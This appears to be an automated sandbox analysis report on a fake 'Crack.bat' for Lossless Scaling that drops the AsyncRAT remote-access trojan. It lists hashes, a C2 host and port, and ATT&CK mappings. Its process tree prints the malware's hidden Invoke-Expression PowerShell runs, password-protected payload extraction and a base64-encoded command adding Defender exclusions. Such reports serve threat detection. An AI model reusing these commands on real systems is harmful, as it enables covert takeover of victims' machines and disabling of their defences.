Analysis
-
max time kernel
490s -
max time network
605s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
25-01-2025 10:43
General
-
Target
lossless scaling/Crack.bat
-
Size
16KB
-
MD5
1f5ea98d27f9d4dfe7da57a12ab5cfb7
-
SHA1
2565fb81fe31c17562106ab046f9d8a8f1d0b3c5
-
SHA256
9dba4747cdba2b31fbbcd2c30ef3c71d2e63ae01a8cd1765d385d065bafa21e5
-
SHA512
3e35d5d4d2212376eeed7be09aaeb6ed200d644ef50122f586a51f130d027f3e54f7af9bd14ba184a0ffe4a13f4cb4dff9e5da776df24f7b710f665aece3dfe4
-
SSDEEP
192:wA7T3nY6jgx4v7UHKtg+NS+7iASgon5ydpakLNfW9FATzSdcO7lgtVhwqgc8Z+Co:nya1TwSaerstRGj
Malware Config
Extracted
asyncrat
A 14
Default
3x3.casacam.net:303
MaterxMutex_Egypt2
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
UAC bypass 3 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 6 IoCs
-
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry class 1 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 31 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Crack.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
-
-
C:\Windows\system32\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Temp\lossless scaling\\language\en-US" "C:\Users\Public\IObitUnlocker" /E /H /C /I2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "& {Get-Content 'C:\Users\Public\IObitUnlocker\UK.dll' | Out-String | Invoke-Expression}"2⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵
-
-
C:\Users\Public\IObitUnlocker\RAR.exe"C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\3⤵
- Executes dropped EXE
-
-
C:\Users\Public\IObitUnlocker\BR\Font.exe"C:\Users\Public\IObitUnlocker\BR\Font.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\kpapra.exe"' & exit6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\kpapra.exe"'7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\kpapra.exe"C:\Users\Admin\AppData\Local\Temp\kpapra.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵
-
-
-
C:\Windows\system32\mode.commode con: cols=80 lines=102⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUA1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exeC:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exeC:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
838B
MD5b2a93166280809b9da482126a28346f6
SHA113705957ad74170698714cc84624196176610f14
SHA256d309ddf505140ba12b7ce857aa7e822f24523b86774d423bf1d74c0cf13ff63d
SHA512924f31c62f16074ebce62227b417b5ba038cbb54f39390a722e2f934c939eed4b47e2d8dcc87727337d8ddef70466be905cd2e94b386a91ab1ff35b86f9c96fb
-
Filesize
3KB
MD522e796539d05c5390c21787da1fb4c2b
SHA155320ebdedd3069b2aaf1a258462600d9ef53a58
SHA2567c6c09f48f03421430d707d27632810414e5e2bf2eecd5eb675fecf8b45a9a92
SHA512d9cc0cb22df56db72a71504bb3ebc36697e0a7a1d2869e0e0ab61349bda603298fe6c667737b79bf2235314fb49b883ba4c5f137d002e273e79391038ecf9c09
-
Filesize
1KB
MD591e9048869f2f1a925269ac53c6c5598
SHA135d9f8df9de401c104c751b3789b273db414ad26
SHA256665af1fbe5d2ab4e411b90f14d11e7140f3d4041bd8d99cc958b82647de18de4
SHA512f5afb60d1480b6f8d86a074bd2904193a7b005040b78b48831119e3c75d8f354cf827d48daf5ea558b0f6e3533629c17e62beed49907df1862db9d98cb869afa
-
Filesize
15KB
MD5e16d2ad7a10e870b4b92c528b7e0bcfc
SHA1911570f31ea16d9b251621d92a583f91ad261561
SHA256f9dc983296779d2f0051d3ab8716577afaed107c89cdcfc71eb6945f708b6dca
SHA512d4716e1995d07b2cf3bf2ccd67c4343bdf77e3fe3dd28176f3a5faab18f193da8efdf66de5bba8c7096f6688575b0c5b6d11ec1b47c83088c9f8cfc2ab8ec6a4
-
Filesize
1KB
MD5b72ce05166195fb5b735f51362a8e032
SHA11ac77d57edfe9cb32d156e53da1e8109acfca013
SHA2565bfa189d95c903200d92d51d2bcb555a19612916a8437a948f7a6ae487bc0112
SHA512f9dfb1775981ece4ef2654834725eeb84a74f6c0e3a5ed2191a23b4b22b1a35a03ad2df3e09ebe4fdf455d54970f705474a8ee84c9be39f0e8c2c54aa66a112e
-
Filesize
156KB
MD56981d94fbcc31ca50551300f5b4a96a3
SHA1e38b3a74f2951f5480fb67acc75d41f3e2b4f70e
SHA2568c19a90379611efc39c3e96529de2e82a99e3e049d36ef6563ec975836e47811
SHA512b94e87c641009ab8206c91ede3e35ab3b65a94fa3be5f4ce7c8a2b17af018f03801086c850427f4d51f4867a3d0a85aaf58ece9fd7f6a36f68df29da430c8d5d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
628KB
MD51d53f5a867dd69486834f81a7a490a2d
SHA14154fe5c8e4b1a6141c8ea21b9f1a13ed7a4d91c
SHA256f804e0bf63f75b3a11c182054a8f02d4f9d2fb182c3a49b105dece388d8d06a1
SHA512769c1e9d9ab34bbd6ff3a0ee06d8e21a64e47861712bf92644a7f9f8d1b035dcf148a6d5d92da16ed82c720b0366e26fb93a0fef91e12a70c1790514bf2fe5c1
-
Filesize
434KB
MD568c9ee084cc409309b116ec6aea890a8
SHA1efd6aab18a08a63b146ad587d1fa08e0bb19bebc
SHA256ef2cbfdfdd874c6c3ea11223b369fbd5f155d20c680ae1e59ac74e6f1bb74a9d
SHA5129809477d42df7bbbaea04da5eda4a4f2ae3114b33541a4efd7003bab339d1c6ddf2f9a61b2ba781c0f5de82b030859c8ac76cbe697b296046227c1dc6b547a25
-
Filesize
181KB
MD5a435e2fb659a3596b017f556b53fa09d
SHA1c9ab6229bf239edac73593e0ffb53c1d9bb21686
SHA256e7f03b61cff5526877ea3f26f613caf5dbdf9006d49b98c906de3051067d7512
SHA512aa3fa16420e66bcdff349ba66791d7849a67d2ae720fdca4b3674ce2a8bffd7a1caae1a306c6533446950b0f8798d6cf7e37ec78ea199252028870fbc742f495
-
Filesize
308B
MD52993b76e0b0ba015caf654881638a0c0
SHA17fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd
SHA2560e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3
SHA512a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb
-
Filesize
629KB
MD5d3e9f98155c0faab869ccc74fb5e8a1e
SHA18e4feaad1d43306fdd8aa66efa443bca7afde710
SHA2563e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b
SHA5122760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d
-
Filesize
457KB
MD5dd3f962ccc2f5b5f34700307e35138f8
SHA190d80df0ef716260a7d4ed466cf40caf966f0969
SHA256e273b5a8cf3d3d37ff676251aa4f41e3726b45b3280f8bf84bf618ca05cca9bb
SHA512619fba6cd9b8aae26db23f9cbd6db4870f969abd198d3fe8551703a1e2c46a9d1fd861f7b9462d82581b322209795c1e00762ebe31e0a1383c8a10df8e4a9eae
-
Filesize
5KB
MD53fffc04611766c3d49b9f0b74752a2b5
SHA1c70e6e3b2cd315e900f6dfdd5828cbf75b903fe5
SHA2567537dd03a875384bc79a7a21811e06ca97de3571631fc20b4b86b26baaafad9d
SHA5123ded3c5712f93eaa75fc9fe9469a02ece5996b6574d63b7b3a5db86db74762631e35aacae519ea3d23862bdaffab5e786696eeb812b0d1ce7f14b78f4539b4d8
-
Filesize
664KB
-
Filesize
4.8MB
-
Filesize
624KB
-
Filesize
304KB
-
Filesize
32KB
-
Filesize
24KB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
600KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
216KB
-
Filesize
472KB
-
Filesize
88KB
-
Filesize
408KB
-
Filesize
56KB
-
Filesize
120KB
-
Filesize
48KB
-
Filesize
40KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
336KB
-
Filesize
304KB
-
Filesize
648KB
-
Filesize
992KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
344KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
976KB
-
Filesize
344KB
-
Filesize
5.6MB
-
Filesize
584KB
-
Filesize
40KB
-
Filesize
456KB
-
Filesize
624KB